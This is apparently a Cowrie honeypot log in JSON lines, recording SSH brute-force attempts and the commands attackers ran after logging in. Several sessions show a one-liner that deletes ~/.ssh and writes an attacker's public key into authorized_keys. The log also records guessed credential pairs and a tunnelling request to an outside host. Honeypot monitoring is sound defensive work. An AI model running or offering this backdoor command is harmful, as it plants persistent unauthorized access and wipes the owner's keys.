{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:46:44.146766Z","src_ip":"158.51.124.56","session":"9c376ba58ffa"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"2025","message":"login attempt [postgres/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T14:46:44.746445Z","src_ip":"158.51.124.56","session":"9c376ba58ffa"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:46:45.890481Z","src_ip":"158.51.124.56","session":"9c376ba58ffa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58344,"dst_ip":"1.2.3.4","dst_port":22,"session":"f18dfbf5c4b4","protocol":"ssh","message":"New connection: 212.227.235.229:58344 (1.2.3.4:22) [session: f18dfbf5c4b4]","sensor":"my-vps","timestamp":"2025-09-08T14:47:32.462124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:47:32.462942Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:47:32.584648Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.login.success","username":"root","password":"BS61?b=o7]hZ","message":"login attempt [root/BS61?b=o7]hZ] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:47:33.113427Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:47:33.410148Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:47:33.410832Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:47:33.411701Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:47:33.535476Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:47:33.795850Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:47:33.796512Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:47:33.920244Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:47:33.921126Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58346,"dst_ip":"1.2.3.4","dst_port":22,"session":"53bd78fa8425","protocol":"ssh","message":"New connection: 212.227.235.229:58346 (1.2.3.4:22) [session: 53bd78fa8425]","sensor":"my-vps","timestamp":"2025-09-08T14:47:34.039209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:47:34.040082Z","src_ip":"212.227.235.229","session":"53bd78fa8425"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:47:34.159408Z","src_ip":"212.227.235.229","session":"53bd78fa8425"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:47:34.681158Z","src_ip":"212.227.235.229","session":"53bd78fa8425"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:47:35.803436Z","src_ip":"212.227.235.229","session":"53bd78fa8425"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58354,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdeb00550617","protocol":"ssh","message":"New connection: 212.227.235.229:58354 (1.2.3.4:22) [session: fdeb00550617]","sensor":"my-vps","timestamp":"2025-09-08T14:47:35.924517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:47:35.925458Z","src_ip":"212.227.235.229","session":"fdeb00550617"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:47:36.047652Z","src_ip":"212.227.235.229","session":"fdeb00550617"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:47:36.579630Z","src_ip":"212.227.235.229","session":"fdeb00550617"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:47:36.703511Z","src_ip":"212.227.235.229","session":"f18dfbf5c4b4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:47:36.704360Z","src_ip":"212.227.235.229","session":"fdeb00550617"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":59348,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae7b3b06f541","protocol":"ssh","message":"New connection: 158.51.124.56:59348 (1.2.3.4:22) [session: ae7b3b06f541]","sensor":"my-vps","timestamp":"2025-09-08T14:47:52.065874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:47:52.066550Z","src_ip":"158.51.124.56","session":"ae7b3b06f541"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:47:52.205077Z","src_ip":"158.51.124.56","session":"ae7b3b06f541"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"123","message":"login attempt [vagrant/123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:47:52.799437Z","src_ip":"158.51.124.56","session":"ae7b3b06f541"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:47:53.941216Z","src_ip":"158.51.124.56","session":"ae7b3b06f541"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41263,"dst_ip":"1.2.3.4","dst_port":22,"session":"e985e4d28873","protocol":"ssh","message":"New connection: 212.227.125.160:41263 (1.2.3.4:22) [session: e985e4d28873]","sensor":"my-vps","timestamp":"2025-09-08T14:47:56.401867Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:47:56.402977Z","src_ip":"212.227.125.160","session":"e985e4d28873"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41546,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5d588df4843","protocol":"ssh","message":"New connection: 212.227.125.160:41546 (1.2.3.4:22) [session: f5d588df4843]","sensor":"my-vps","timestamp":"2025-09-08T14:47:56.510216Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:47:56.512644Z","src_ip":"212.227.125.160","session":"f5d588df4843"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T14:47:56.621845Z","src_ip":"212.227.125.160","session":"f5d588df4843"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:47:57.065425Z","src_ip":"212.227.125.160","session":"f5d588df4843"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T14:47:57.177529Z","session":"f5d588df4843"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40871,"dst_ip":"1.2.3.4","dst_port":23,"session":"d9e4c1ee6e16","protocol":"telnet","message":"New connection: 212.227.235.229:40871 (1.2.3.4:23) [session: d9e4c1ee6e16]","sensor":"my-vps","timestamp":"2025-09-08T14:48:01.075114Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":36914,"dst_ip":"1.2.3.4","dst_port":22,"session":"5530d1bc1c51","protocol":"ssh","message":"New connection: 185.255.91.51:36914 (1.2.3.4:22) [session: 5530d1bc1c51]","sensor":"my-vps","timestamp":"2025-09-08T14:48:11.239516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:48:11.240635Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:48:11.342711Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.login.success","username":"root","password":"123asd!@#","message":"login attempt [root/123asd!@#] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:48:11.797944Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:48:12.045636Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:48:12.046406Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:48:12.047837Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:12.153817Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:48:12.414797Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:48:12.415662Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:48:12.519869Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:48:12.520809Z","src_ip":"185.255.91.51","session":"5530d1bc1c51"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":36926,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c76d3cc93e2","protocol":"ssh","message":"New connection: 185.255.91.51:36926 (1.2.3.4:22) [session: 9c76d3cc93e2]","sensor":"my-vps","timestamp":"2025-09-08T14:48:12.615829Z"}
